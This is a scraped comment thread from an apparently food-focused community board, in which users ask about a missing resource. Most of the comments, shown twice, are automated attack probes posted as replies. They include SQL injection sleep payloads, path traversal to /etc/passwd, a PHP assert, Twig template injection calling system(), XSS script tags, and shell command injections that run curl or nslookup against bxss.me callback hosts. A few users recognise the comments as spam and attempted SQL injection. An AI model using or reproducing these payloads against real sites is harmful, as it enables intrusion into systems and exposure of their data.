It was such an incredible source of information. I cannot find it anywhere on the site. Is there a plan to put it back online?
Sorry, I'm just commenting to send this to the top for those that sort by latest reply
re: Lynch91
response.write(9024448*9061344)
'+response.write(9024448*9061344)+'
"+response.write(9024448*9061344)+"
<esi:include src="http://bxss.me/rpb.png"/>
${9999144+9999108}
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
../
redirtest.acx
)
!(()&&!|*|*|
^(#$!@#$)(()))******
ctimesleepp0(I30tp1Rp2.
'"()
'&&sleep(27*1000)*fizair&&'
'.gethostbyname(lc('hitbu'.'zfnezgdq0e2e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(67).chr(108).chr(74).'
"&&sleep(27*1000)*detwzl&&"
".gethostbyname(lc("hitkb"."smhtjvdk38b0d.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(77).chr(120).chr(65)."
'||sleep(27*1000)*lnbmte||'
gethostbyname(lc('hitrr'.'ayxiqqdb24393.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(69).chr(99).chr(76)
"||sleep(27*1000)*ebynem||"
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
HttP://bxss.me/t/xss.html?%00
c:/windows/win.ini
bxss.me/t/xss.html?%00
bxss.me
Http://bxss.me/t/fit.txt
echo ymbsez$()\ awsgad\nz^xyu||a #' &echo ymbsez$()\ awsgad\nz^xyu||a #|" &echo ymbsez$()\ awsgad\nz^xyu||a #
http://bxss.me/t/fit.txt?.jpg
index.php
&echo slcdbv$()\ tdxmfx\nz^xyu||a #' &echo slcdbv$()\ tdxmfx\nz^xyu||a #|" &echo slcdbv$()\ tdxmfx\nz^xyu||a #
"+"A".concat(70-3).concat(22*4).concat(111).concat(76).concat(113).concat(66)+(require"socket"Socket.gethostbyname("hitms"+"cjfihtyp11021.bxss.me.")[3].to_s)+"
|echo onxyvd$()\ dhtmme\nz^xyu||a #' |echo onxyvd$()\ dhtmme\nz^xyu||a #|" |echo onxyvd$()\ dhtmme\nz^xyu||a #
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
'+'A'.concat(70-3).concat(22*4).concat(117).concat(67).concat(101).concat(69)+(require'socket'Socket.gethostbyname('hitsl'+'lvbowiaz9cf65.bxss.me.')[3].to_s)+'
index.php/.
expr 9000366172 - 971614
';print(md5(31337));$a='
'A'.concat(70-3).concat(22*4).concat(122).concat(81).concat(98).concat(80)+(require'socket'Socket.gethostbyname('hitql'+'xhdhsxvtcaf08.bxss.me.')[3].to_s)
(nslookup -q=cname hitdcnibflayvdae99.bxss.me||curl hitdcnibflayvdae99.bxss.me))
";print(md5(31337));$a="
$(nslookup -q=cname hitepadgrosut6dbd2.bxss.me||curl hitepadgrosut6dbd2.bxss.me)
${@print(md5(31337))}
'"
&nslookup -q=cname hitwqwvbebsplc3054.bxss.me&'\"`0&nslookup -q=cname hitwqwvbebsplc3054.bxss.me&`'
${@print(md5(31337))}\
<!--
&(nslookup -q=cname hitshvcbulxdlca5c8.bxss.me||curl hitshvcbulxdlca5c8.bxss.me)&'\"`0&(nslookup -q=cname hitshvcbulxdlca5c8.bxss.me||curl hitshvcbulxdlca5c8.bxss.me)&`'
'.print(md5(31337)).'
|(nslookup -q=cname hitfgikbofydr4fe04.bxss.me||curl hitfgikbofydr4fe04.bxss.me)
`(nslookup -q=cname hitlcktpdrocf63116.bxss.me||curl hitlcktpdrocf63116.bxss.me)`
;(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)|(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)&(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitmzvculvhoc7ee7d.bxss.me||curl${IFS}hitmzvculvhoc7ee7d.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitbruxkzbwyu0df81.bxss.me||curl${IFS}hitbruxkzbwyu0df81.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitbruxkzbwyu0df81.bxss.me||curl${IFS}hitbruxkzbwyu0df81.bxss.me)&`'
'"()&%<zzz><ScRiPt >r50B(9138)</ScRiPt>
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitblmiaczniafbbbb.bxss.me")}}
'"()&%<zzz><ScRiPt >r50B(9544)</ScRiPt>
9700575
lTyRrbto
*1
-1 OR 5*5=25 --
-1 OR 5*5=26 --
-1 OR 5*5=25
-1 OR 5*5=26
*if(now()=sysdate(),sleep(15),0)
0'XOR(*if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1 waitfor delay '0:0:15' --
BqkpnixX'; waitfor delay '0:0:15' --
-1 OR 177=(SELECT 177 FROM PG_SLEEP(15))--
-1) OR 895=(SELECT 895 FROM PG_SLEEP(15))--
-1)) OR 380=(SELECT 380 FROM PG_SLEEP(15))--
rstNiaZU' OR 92=(SELECT 92 FROM PG_SLEEP(15))--
6hyixitY') OR 571=(SELECT 571 FROM PG_SLEEP(15))--
7g3t5RI0')) OR 543=(SELECT 543 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'||(select 1 from (select pg_sleep(15))x)||'
''||(select 1 from (select pg_sleep(15))x)||''
@@Y8Fa2
(select 198766*667891)
(select 198766*667891 from DUAL)
I was wondering where it went as well.
I saw that it has been spammed, so likely Saito-san is cleaning it up right now
Yeah the spam was pretty bad. Looks like some SQL injection was being attempted, based on the spam's contents.
What kind of jerk would attack a foodie discussion board?
In other news, the language selection for the community section is broken. I select "English" as the language (and it displays locale=en) but all the date stamps are in Japanese.
Just weird that the hacker is doing SQL injection on the comments section. People usually do it on the login page.
Do you still receive Q&A?
8 Comments
Sorry, I'm just commenting to send this to the top for those that sort by latest reply
re: Lynch91
response.write(9024448*9061344)
re: Lynch91
'+response.write(9024448*9061344)+'
re: Lynch91
"+response.write(9024448*9061344)+"
re: Lynch91
<esi:include src="http://bxss.me/rpb.png"/>
re: Lynch91
${9999144+9999108}
re: Lynch91
../../../../../../../../../../../../../../etc/passwd
re: Lynch91
../../../../../../../../../../../../../../windows/win.ini
re: Lynch91
file:///etc/passwd
re: Lynch91
../
re: Lynch91
redirtest.acx
re: Lynch91
)
re: Lynch91
!(()&&!|*|*|
re: Lynch91
^(#$!@#$)(()))******
re: Lynch91
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Lynch91
'"()
re: Lynch91
'&&sleep(27*1000)*fizair&&'
re: Lynch91
'.gethostbyname(lc('hitbu'.'zfnezgdq0e2e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(67).chr(108).chr(74).'
re: Lynch91
"&&sleep(27*1000)*detwzl&&"
re: Lynch91
".gethostbyname(lc("hitkb"."smhtjvdk38b0d.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(77).chr(120).chr(65)."
re: Lynch91
'||sleep(27*1000)*lnbmte||'
re: Lynch91
gethostbyname(lc('hitrr'.'ayxiqqdb24393.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(69).chr(99).chr(76)
re: Lynch91
"||sleep(27*1000)*ebynem||"
re: Lynch91
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Lynch91
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: Lynch91
/etc/shells
re: Lynch91
../../../../../../../../../../../../../../etc/shells
re: Lynch91
HttP://bxss.me/t/xss.html?%00
re: Lynch91
c:/windows/win.ini
re: Lynch91
bxss.me/t/xss.html?%00
re: Lynch91
bxss.me
re: Lynch91
Http://bxss.me/t/fit.txt
re: Lynch91
echo ymbsez$()\ awsgad\nz^xyu||a #' &echo ymbsez$()\ awsgad\nz^xyu||a #|" &echo ymbsez$()\ awsgad\nz^xyu||a #
re: Lynch91
http://bxss.me/t/fit.txt?.jpg
re: Lynch91
index.php
re: Lynch91
&echo slcdbv$()\ tdxmfx\nz^xyu||a #' &echo slcdbv$()\ tdxmfx\nz^xyu||a #|" &echo slcdbv$()\ tdxmfx\nz^xyu||a #
re: Lynch91
index.php
re: Lynch91
"+"A".concat(70-3).concat(22*4).concat(111).concat(76).concat(113).concat(66)+(require"socket"
Socket.gethostbyname("hitms"+"cjfihtyp11021.bxss.me.")[3].to_s)+"
re: Lynch91
|echo onxyvd$()\ dhtmme\nz^xyu||a #' |echo onxyvd$()\ dhtmme\nz^xyu||a #|" |echo onxyvd$()\ dhtmme\nz^xyu||a #
re: Lynch91
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Lynch91
'+'A'.concat(70-3).concat(22*4).concat(117).concat(67).concat(101).concat(69)+(require'socket'
Socket.gethostbyname('hitsl'+'lvbowiaz9cf65.bxss.me.')[3].to_s)+'
re: Lynch91
index.php/.
re: Lynch91
expr 9000366172 - 971614
re: Lynch91
';print(md5(31337));$a='
re: Lynch91
'A'.concat(70-3).concat(22*4).concat(122).concat(81).concat(98).concat(80)+(require'socket'
Socket.gethostbyname('hitql'+'xhdhsxvtcaf08.bxss.me.')[3].to_s)
re: Lynch91
(nslookup -q=cname hitdcnibflayvdae99.bxss.me||curl hitdcnibflayvdae99.bxss.me))
re: Lynch91
";print(md5(31337));$a="
re: Lynch91
$(nslookup -q=cname hitepadgrosut6dbd2.bxss.me||curl hitepadgrosut6dbd2.bxss.me)
re: Lynch91
${@print(md5(31337))}
re: Lynch91
'"
re: Lynch91
&nslookup -q=cname hitwqwvbebsplc3054.bxss.me&'\"`0&nslookup -q=cname hitwqwvbebsplc3054.bxss.me&`'
re: Lynch91
${@print(md5(31337))}\
re: Lynch91
<!--
re: Lynch91
&(nslookup -q=cname hitshvcbulxdlca5c8.bxss.me||curl hitshvcbulxdlca5c8.bxss.me)&'\"`0&(nslookup -q=cname hitshvcbulxdlca5c8.bxss.me||curl hitshvcbulxdlca5c8.bxss.me)&`'
re: Lynch91
'.print(md5(31337)).'
re: Lynch91
|(nslookup -q=cname hitfgikbofydr4fe04.bxss.me||curl hitfgikbofydr4fe04.bxss.me)
re: Lynch91
`(nslookup -q=cname hitlcktpdrocf63116.bxss.me||curl hitlcktpdrocf63116.bxss.me)`
re: Lynch91
;(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)|(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)&(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)
re: Lynch91
|(nslookup${IFS}-q${IFS}cname${IFS}hitmzvculvhoc7ee7d.bxss.me||curl${IFS}hitmzvculvhoc7ee7d.bxss.me)
re: Lynch91
&(nslookup${IFS}-q${IFS}cname${IFS}hitbruxkzbwyu0df81.bxss.me||curl${IFS}hitbruxkzbwyu0df81.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitbruxkzbwyu0df81.bxss.me||curl${IFS}hitbruxkzbwyu0df81.bxss.me)&`'
re: Lynch91
'"()&%<zzz><ScRiPt >r50B(9138)</ScRiPt>
re: Lynch91
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitblmiaczniafbbbb.bxss.me")}}
re: Lynch91
'"()&%<zzz><ScRiPt >r50B(9544)</ScRiPt>
re: Lynch91
9700575
re: Lynch91
lTyRrbto
re: Lynch91
*1
re: Lynch91
*1
re: Lynch91
*1
re: Lynch91
*1
re: Lynch91
-1 OR 5*5=25 --
re: Lynch91
-1 OR 5*5=26 --
re: Lynch91
-1 OR 5*5=25
re: Lynch91
-1 OR 5*5=26
re: Lynch91
*if(now()=sysdate(),sleep(15),0)
re: Lynch91
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Lynch91
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Lynch91
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Lynch91
-1; waitfor delay '0:0:15' --
re: Lynch91
-1); waitfor delay '0:0:15' --
re: Lynch91
-1 waitfor delay '0:0:15' --
re: Lynch91
BqkpnixX'; waitfor delay '0:0:15' --
re: Lynch91
-1 OR 177=(SELECT 177 FROM PG_SLEEP(15))--
re: Lynch91
-1) OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: Lynch91
-1)) OR 380=(SELECT 380 FROM PG_SLEEP(15))--
re: Lynch91
rstNiaZU' OR 92=(SELECT 92 FROM PG_SLEEP(15))--
re: Lynch91
6hyixitY') OR 571=(SELECT 571 FROM PG_SLEEP(15))--
re: Lynch91
7g3t5RI0')) OR 543=(SELECT 543 FROM PG_SLEEP(15))--
re: Lynch91
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Lynch91
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Lynch91
'||(select 1 from (select pg_sleep(15))x)||'
re: Lynch91
''||(select 1 from (select pg_sleep(15))x)||''
re: Lynch91
'"
re: Lynch91
@@Y8Fa2
re: Lynch91
(select 198766*667891)
re: Lynch91
(select 198766*667891 from DUAL)
I was wondering where it went as well.
I saw that it has been spammed, so likely Saito-san is cleaning it up right now
Yeah the spam was pretty bad. Looks like some SQL injection was being attempted, based on the spam's contents.
What kind of jerk would attack a foodie discussion board?
In other news, the language selection for the community section is broken. I select "English" as the language (and it displays locale=en) but all the date stamps are in Japanese.
Just weird that the hacker is doing SQL injection on the comments section. People usually do it on the login page.
Do you still receive Q&A?